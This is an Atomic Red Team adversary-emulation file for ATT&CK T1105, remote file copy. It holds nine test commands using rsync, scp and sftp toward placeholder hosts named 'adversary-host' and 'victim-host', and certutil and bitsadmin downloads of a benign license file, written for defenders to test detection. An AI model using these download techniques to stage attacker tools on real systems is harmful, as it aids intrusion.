atomic-red-team/atomics/T1105/T1105.md

# T1105 - Remote File Copy
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1105)
<blockquote>Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).</blockquote>

## Atomic Tests

- [Atomic Test #1 - rsync remote file copy (push)](#atomic-test-1---rsync-remote-file-copy-push)

- [Atomic Test #2 - rsync remote file copy (pull)](#atomic-test-2---rsync-remote-file-copy-pull)

- [Atomic Test #3 - scp remote file copy (push)](#atomic-test-3---scp-remote-file-copy-push)

- [Atomic Test #4 - scp remote file copy (pull)](#atomic-test-4---scp-remote-file-copy-pull)

- [Atomic Test #5 - sftp remote file copy (push)](#atomic-test-5---sftp-remote-file-copy-push)

- [Atomic Test #6 - sftp remote file copy (pull)](#atomic-test-6---sftp-remote-file-copy-pull)

- [Atomic Test #7 - certutil download (urlcache)](#atomic-test-7---certutil-download-urlcache)

- [Atomic Test #8 - certutil download (verifyctl)](#atomic-test-8---certutil-download-verifyctl)

- [Atomic Test #9 - Windows - BITSAdmin BITS Download](#atomic-test-9---windows---bitsadmin-bits-download)


<br/>

## Atomic Test #1 - rsync remote file copy (push)
Utilize rsync to perform a remote file copy (push)

**Supported Platforms:** Linux, macOS


#### Inputs
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| local_path | Path of folder to copy | Path | /tmp/adversary-rsync/|
| username | User account to authenticate on remote host | String | victim|
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive rsync | Path | /tmp/victim-files|

#### Run it with `bash`! 
```
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
```



<br/>
<br/>

## Atomic Test #2 - rsync remote file copy (pull)
Utilize rsync to perform a remote file copy (pull)

**Supported Platforms:** Linux, macOS


#### Inputs
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| remote_path | Path of folder to copy | Path | /tmp/adversary-rsync/|
| username | User account to authenticate on remote host | String | adversary|
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive rsync | Path | /tmp/victim-files|

#### Run it with `bash`! 
```
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
```



<br/>
<br/>

## Atomic Test #3 - scp remote file copy (push)
Utilize scp to perform a remote file copy (push)

**Supported Platforms:** Linux, macOS


#### Inputs
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| local_file | Path of file to copy | Path | /tmp/adversary-scp|
| username | User account to authenticate on remote host | String | victim|
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive scp | Path | /tmp/victim-files/|

#### Run it with `bash`! 
```
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
```



<br/>
<br/>

## Atomic Test #4 - scp remote file copy (pull)
Utilize scp to perform a remote file copy (pull)

**Supported Platforms:** Linux, macOS


#### Inputs
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| remote_file | Path of file to copy | Path | /tmp/adversary-scp|
| username | User account to authenticate on remote host | String | adversary|
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive scp | Path | /tmp/victim-files/|

#### Run it with `bash`! 
```
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
```



<br/>
<br/>

## Atomic Test #5 - sftp remote file copy (push)
Utilize sftp to perform a remote file copy (push)

**Supported Platforms:** Linux, macOS


#### Inputs
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| local_file | Path of file to copy | Path | /tmp/adversary-sftp|
| username | User account to authenticate on remote host | String | victim|
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive sftp | Path | /tmp/victim-files/|

#### Run it with `bash`! 
```
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
```



<br/>
<br/>

## Atomic Test #6 - sftp remote file copy (pull)
Utilize sftp to perform a remote file copy (pull)

**Supported Platforms:** Linux, macOS


#### Inputs
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| remote_file | Path of file to copy | Path | /tmp/adversary-sftp|
| username | User account to authenticate on remote host | String | adversary|
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive sftp | Path | /tmp/victim-files/|

#### Run it with `bash`! 
```
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
```



<br/>
<br/>

## Atomic Test #7 - certutil download (urlcache)
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!

**Supported Platforms:** Windows


#### Inputs
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|

#### Run it with `command_prompt`! 
```
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
```



<br/>
<br/>

## Atomic Test #8 - certutil download (verifyctl)
Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!

**Supported Platforms:** Windows


#### Inputs
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|

#### Run it with `powershell`! 
```
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
```



<br/>
<br/>

## Atomic Test #9 - Windows - BITSAdmin BITS Download
This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.
This technique is used by Qbot malware to download payloads.

**Supported Platforms:** Windows


#### Inputs
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| bits_job_name | Name of the created BITS job | String | qcxjb7|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|

#### Run it with `command_prompt`! 
```
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
```



<br/>